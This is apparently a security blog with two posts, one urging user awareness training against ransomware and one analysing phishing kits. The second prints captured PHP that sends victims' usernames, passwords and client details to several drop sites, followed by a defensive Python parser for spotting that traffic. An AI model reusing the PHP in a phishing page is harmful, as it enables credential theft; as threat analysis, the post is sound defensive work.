User awareness training – the forgotten first line of defense in the fight against ransomware

2 April 2016

Ransomware attacks seem to be increasing dramatically at the moment. In particular, hospitals all over the world are suffering gravely from attacks. Last Thursday, the governments of the United States and Canada published the joint Cyber Alert (TA16-091A):

‘The United States Department of Homeland Security (DHS), in collaboration with Canadian Cyber Incident Response Centre (CCIRC), is releasing this Alert to provide further information on ransomware, specifically its main characteristics, its prevalence, variants that may be proliferating, and how users can prevent and mitigate against ransomware.’

In the section Solution, advice is given on preventing infections and on mitigating risk. To be honest, this alert should be mandatory reading for all administrators.

But user awareness training is shabbily treated, although it is the first line of defense and training material is readily available. The Stop.Think.Connect Toolkits offer target-group-specific training materials and tip cards. The Industry Employee Tip Card gives eight simple tips, e.g.

  1. Don’t share any of your user names, passwords, or other computer or website access codes.
  2. Only open emails or attachments from people you know.

Let me add my favorite tip:

  1. Don’t use your company username, password and email address for private purposes.

Have a good weekend, and start awareness training next Monday.


11 October 2015

The past week was full of exciting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone, I had the chance to create a copy of the POST processing PHP procedure:

```php
// Record the kit assembles from the submitted form and the victim's request:
// credentials first, then client details, separated by "#:#".
$data = "#$user#$pass#:#$ip#$browser#$hostname";

// POST the record as form field "info" to one drop site.
function writeit($data, $site) {
    global $textHos;   // declared but never used in the captured copy
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context = stream_context_create($options);
    $result  = file_get_contents($site, false, $context);
}

// $sites holds the drop sites (three in the captured copy; values omitted here).
foreach ($sites as $site) {
    writeit($data, $site);
}
```

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case, username and password are forwarded to 3 sites for further processing.
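As an added example that is not part of the original post, here is a Python parser for the POST body this kit sends to its drop sites, as a responder who captures that traffic (proxy log, sinkholed drop site) would want it: the field layout `#user#pass#:#ip#browser#hostname` is taken from the `$data` line above, the sample body is constructed, and the function names are my own.

```python
from urllib.parse import parse_qs, urlencode

SEPARATOR = "#:#"  # divides the credential half from the client-info half


def parse_exfil_body(body: str) -> dict:
    """Return the fields of one captured POST body, or raise ValueError.

    Tolerates '#' inside the password and inside the browser string: the
    username is the first credential field, the IP the first client field
    and the hostname the last, so everything in between is rejoined.
    """
    params = parse_qs(body, keep_blank_values=True)
    if "info" not in params:
        raise ValueError("no info field: not this kit's format")
    info = params["info"][0]
    if not info.startswith("#") or SEPARATOR not in info:
        raise ValueError("info field does not match #user#pass#:#... layout")
    creds, client = info[1:].split(SEPARATOR, 1)
    user, _, password = creds.partition("#")
    client_parts = client.split("#")
    if len(client_parts) < 3:
        raise ValueError("client half lacks ip/browser/hostname")
    return {
        "user": user,
        "password": password,
        "ip": client_parts[0],
        "browser": "#".join(client_parts[1:-1]),
        "hostname": client_parts[-1],
    }


def redact(record: dict) -> dict:
    """Copy of the record with the password masked, safe to paste into a ticket."""
    out = dict(record)
    out["password"] = "*" * len(record["password"])
    return out


# Constructed sample of what a drop site would receive; not real victim data.
SAMPLE_INFO = "#alice@example.com#s3cr#t!#:#203.0.113.7#Mozilla/5.0 (X11; Linux x86_64)#victim-pc"
SAMPLE_BODY = urlencode({"info": SAMPLE_INFO})

if __name__ == "__main__":
    print(redact(parse_exfil_body(SAMPLE_BODY)))
```

The same split logic can be run over the request bodies in a web proxy log to find outbound POSTs that match the kit's layout.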

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days, only 10 of 65 scanners classify the pages as malicious or as phishing sites.

What surprised me was that most of the pages were listed in blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant; unfortunately, no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the Anti-Phishing Working Group (APWG) and the National Cyber Security Alliance (NCSA). The campaign’s slogan is ‘Keeping the web a safer place for everyone’. The campaign provides lots of information about two-factor authentication and tips for safe use of the internet. Take a look at the funny video clips.

Take care, and have a good week.